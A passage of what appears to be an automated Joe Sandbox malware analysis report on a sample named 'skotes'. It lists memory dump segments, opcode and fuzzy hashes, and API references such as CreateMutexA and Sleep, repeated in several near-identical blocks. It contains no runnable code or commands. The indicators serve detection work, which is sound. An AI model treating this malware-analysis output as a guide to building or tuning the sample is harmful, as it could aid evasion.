                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2531987475-0
                                                                                                                                                                • Opcode ID: 68f9ba092d37b2f0326d5e42bed0c42c5bf42cd6fca3db2b431ebe0a88c3e6d1
                                                                                                                                                                • Instruction ID: 99417d78e0efdbe50d9347c6594bff7e5916b953b7a5bea755912c6a71361083
                                                                                                                                                                • Opcode Fuzzy Hash: 68f9ba092d37b2f0326d5e42bed0c42c5bf42cd6fca3db2b431ebe0a88c3e6d1
                                                                                                                                                                • Instruction Fuzzy Hash: 1D414A71944604ABDB24EFB5DC419FFBBF9EF89300B10456AF856E3611EA70A900DB21
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B89BA8
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: bb75bfbf1d009bc0be0888191ce62659205189ddafb86b9788161f12736af1a2
                                                                                                                                                                • Instruction ID: dc662c964dcb9856573e03de26cea32cbd294a360806685057b1af4bbde1fbac
                                                                                                                                                                • Opcode Fuzzy Hash: bb75bfbf1d009bc0be0888191ce62659205189ddafb86b9788161f12736af1a2
                                                                                                                                                                • Instruction Fuzzy Hash: 4D3128316042049BFF08EB78DDC9B6DBBE2EBC6314F2482A9E015973E5C7769980CB51
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B89CDD
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: fa02e8f6160cd8a366178186df44b84ae046807b20ec0cf7012ae1ebaed04cd7
                                                                                                                                                                • Instruction ID: 928ddf7a14a6a3f01e18266c82af0a2e9cec42a33ec61d0ff03b64440ad71835
                                                                                                                                                                • Opcode Fuzzy Hash: fa02e8f6160cd8a366178186df44b84ae046807b20ec0cf7012ae1ebaed04cd7
                                                                                                                                                                • Instruction Fuzzy Hash: BD3126316042449BFF08EB78D8C8BADB7E2DBC6310F2846A9E014973E5DB359980C715
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B89F47
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                • Opcode ID: 32ae022dcd407a9623b600174a25f61a3ccf461eca67d0fd39136b0948d388de
                                                                                                                                                                • Instruction ID: 3d144067affddeed00a78bee307ab1d2c7d335f2c0b6df2df909c7317ace8d01
                                                                                                                                                                • Opcode Fuzzy Hash: 32ae022dcd407a9623b600174a25f61a3ccf461eca67d0fd39136b0948d388de
                                                                                                                                                                • Instruction Fuzzy Hash: 9E3127316042449BFF0CEB68D8D9BACB7E2EBC5310F2442A9E114D72E5C735A980C752
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00B8A07C
                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
